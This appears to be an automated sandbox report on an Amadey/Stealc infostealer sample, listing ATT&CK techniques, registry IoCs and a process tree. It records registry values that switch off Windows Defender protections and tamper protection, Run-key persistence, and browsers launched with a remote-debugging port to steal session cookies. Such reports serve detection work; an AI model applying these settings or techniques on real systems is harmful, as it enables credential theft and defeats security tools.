amadey | b4db52719419f608b6b9d01ca88942cf1e27dd03b5509d8b1e36c6d9f1925b3a

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	c51448d082.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	c51448d082.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	c51448d082.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	c51448d082.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	c51448d082.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	c51448d082.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

credential_access stealer

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	file.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	c51448d082.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	DocumentsAAFBAKECAE.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7134274202.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	cddabe90fb.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe

Downloads MZ/PE file

Uses browser remote debugging 2 TTPs 10 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
516	chrome.exe
2256	chrome.exe
4684	chrome.exe
4124	msedge.exe
5004	msedge.exe
2476	msedge.exe
2928	chrome.exe
4424	chrome.exe
3644	msedge.exe
2564	msedge.exe

Checks BIOS information in registry 2 TTPs 18 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7134274202.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	c51448d082.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cddabe90fb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cddabe90fb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	DocumentsAAFBAKECAE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	c51448d082.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	file.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	file.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	DocumentsAAFBAKECAE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7134274202.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	file.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	DocumentsAAFBAKECAE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	skotes.exe

Executes dropped EXE 8 IoCs

pid	Process
4360	DocumentsAAFBAKECAE.exe
1860	skotes.exe
3928	7134274202.exe
2864	cddabe90fb.exe
2272	skotes.exe
1548	c51448d082.exe
3516	skotes.exe
404	skotes.exe

Identifies Wine through registry keys 2 TTPs 9 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine	file.exe
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine	cddabe90fb.exe
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine	DocumentsAAFBAKECAE.exe
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine	7134274202.exe
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine	c51448d082.exe

Loads dropped DLL 3 IoCs

pid	Process
2520	file.exe
2520	file.exe
2520	file.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	c51448d082.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	c51448d082.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7134274202.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1004574001\\7134274202.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cddabe90fb.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1004575001\\cddabe90fb.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c51448d082.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1004577001\\c51448d082.exe"	skotes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

pid	Process
2520	file.exe
4360	DocumentsAAFBAKECAE.exe
1860	skotes.exe
3928	7134274202.exe
2864	cddabe90fb.exe
2272	skotes.exe
1548	c51448d082.exe
3516	skotes.exe
404	skotes.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1860 set thread context of 2272	1860	skotes.exe	139

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	DocumentsAAFBAKECAE.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
4876	3928	WerFault.exe	132
2260	3928	WerFault.exe	132

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DocumentsAAFBAKECAE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7134274202.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cddabe90fb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c51448d082.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	file.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	file.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	file.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133754439754096461"	chrome.exe

Suspicious behavior: EnumeratesProcesses 58 IoCs

pid	Process
2520	file.exe
2520	file.exe
2520	file.exe
2520	file.exe
2520	file.exe
2520	file.exe
516	chrome.exe
516	chrome.exe
2520	file.exe
2520	file.exe
2520	file.exe
2520	file.exe
4368	msedge.exe
4368	msedge.exe
4368	msedge.exe
4368	msedge.exe
4980	msedge.exe
4980	msedge.exe
4124	msedge.exe
4124	msedge.exe
4368	msedge.exe
4368	msedge.exe
4368	msedge.exe
4368	msedge.exe
4368	msedge.exe
4368	msedge.exe
4368	msedge.exe
4368	msedge.exe
4368	msedge.exe
4368	msedge.exe
4368	msedge.exe
4368	msedge.exe
4368	msedge.exe
4368	msedge.exe
4368	msedge.exe
4368	msedge.exe
2520	file.exe
2520	file.exe
2520	file.exe
2520	file.exe
4360	DocumentsAAFBAKECAE.exe
4360	DocumentsAAFBAKECAE.exe
1860	skotes.exe
1860	skotes.exe
3928	7134274202.exe
3928	7134274202.exe
2864	cddabe90fb.exe
2864	cddabe90fb.exe
2272	skotes.exe
2272	skotes.exe
1548	c51448d082.exe
1548	c51448d082.exe
1548	c51448d082.exe
1548	c51448d082.exe
3516	skotes.exe
3516	skotes.exe
404	skotes.exe
404	skotes.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
516	chrome.exe
516	chrome.exe
516	chrome.exe
516	chrome.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeShutdownPrivilege	516	chrome.exe
Token: SeCreatePagefilePrivilege	516	chrome.exe
Token: SeShutdownPrivilege	516	chrome.exe
Token: SeCreatePagefilePrivilege	516	chrome.exe
Token: SeShutdownPrivilege	516	chrome.exe
Token: SeCreatePagefilePrivilege	516	chrome.exe
Token: SeShutdownPrivilege	516	chrome.exe
Token: SeCreatePagefilePrivilege	516	chrome.exe
Token: SeShutdownPrivilege	516	chrome.exe
Token: SeCreatePagefilePrivilege	516	chrome.exe
Token: SeShutdownPrivilege	516	chrome.exe
Token: SeCreatePagefilePrivilege	516	chrome.exe
Token: SeShutdownPrivilege	516	chrome.exe
Token: SeCreatePagefilePrivilege	516	chrome.exe
Token: SeShutdownPrivilege	516	chrome.exe
Token: SeCreatePagefilePrivilege	516	chrome.exe
Token: SeShutdownPrivilege	516	chrome.exe
Token: SeCreatePagefilePrivilege	516	chrome.exe
Token: SeDebugPrivilege	1548	c51448d082.exe

Suspicious use of FindShellTrayWindow 51 IoCs

pid	Process
516	chrome.exe
516	chrome.exe
516	chrome.exe
516	chrome.exe
516	chrome.exe
516	chrome.exe
516	chrome.exe
516	chrome.exe
516	chrome.exe
516	chrome.exe
516	chrome.exe
516	chrome.exe
516	chrome.exe
516	chrome.exe
516	chrome.exe
516	chrome.exe
516	chrome.exe
516	chrome.exe
516	chrome.exe
516	chrome.exe
516	chrome.exe
516	chrome.exe
516	chrome.exe
516	chrome.exe
516	chrome.exe
516	chrome.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe
4124	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2520 wrote to memory of 516	2520	file.exe	90
PID 2520 wrote to memory of 516	2520	file.exe	90
PID 516 wrote to memory of 2140	516	chrome.exe	91
PID 516 wrote to memory of 2140	516	chrome.exe	91
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4848	516	chrome.exe	92
PID 516 wrote to memory of 4332	516	chrome.exe	93
PID 516 wrote to memory of 4332	516	chrome.exe	93
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94
PID 516 wrote to memory of 4268	516	chrome.exe	94

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
  2⤵
  - Uses browser remote debugging
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:516
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe0b5ccc40,0x7ffe0b5ccc4c,0x7ffe0b5ccc58
    3⤵
    PID:2140
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2104,i,9361916029380915593,7254175777495847222,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2100 /prefetch:2
    3⤵
    PID:4848
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1664,i,9361916029380915593,7254175777495847222,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2116 /prefetch:3
    3⤵
    PID:4332
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2016,i,9361916029380915593,7254175777495847222,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2292 /prefetch:8
    3⤵
    PID:4268
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,9361916029380915593,7254175777495847222,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3184 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:2928
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,9361916029380915593,7254175777495847222,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3224 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:2256
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4252,i,9361916029380915593,7254175777495847222,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4504 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:4684
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4616,i,9361916029380915593,7254175777495847222,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4700 /prefetch:8
    3⤵
    PID:2568
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4776,i,9361916029380915593,7254175777495847222,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4684 /prefetch:8
    3⤵
    PID:1728
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4788,i,9361916029380915593,7254175777495847222,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4892 /prefetch:8
    3⤵
    PID:2824
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5020,i,9361916029380915593,7254175777495847222,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4976 /prefetch:8
    3⤵
    PID:756
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5024,i,9361916029380915593,7254175777495847222,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5140 /prefetch:8
    3⤵
    PID:4472
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5180,i,9361916029380915593,7254175777495847222,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5196 /prefetch:8
    3⤵
    PID:4896
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5112,i,9361916029380915593,7254175777495847222,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5124 /prefetch:8
    3⤵
    PID:4276
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4968,i,9361916029380915593,7254175777495847222,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5188 /prefetch:8
    3⤵
    PID:4304
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5276,i,9361916029380915593,7254175777495847222,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4836 /prefetch:2
    3⤵
    - Uses browser remote debugging
    PID:4424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
  2⤵
  - Uses browser remote debugging
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  PID:4124
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe19e946f8,0x7ffe19e94708,0x7ffe19e94718
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:4368
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
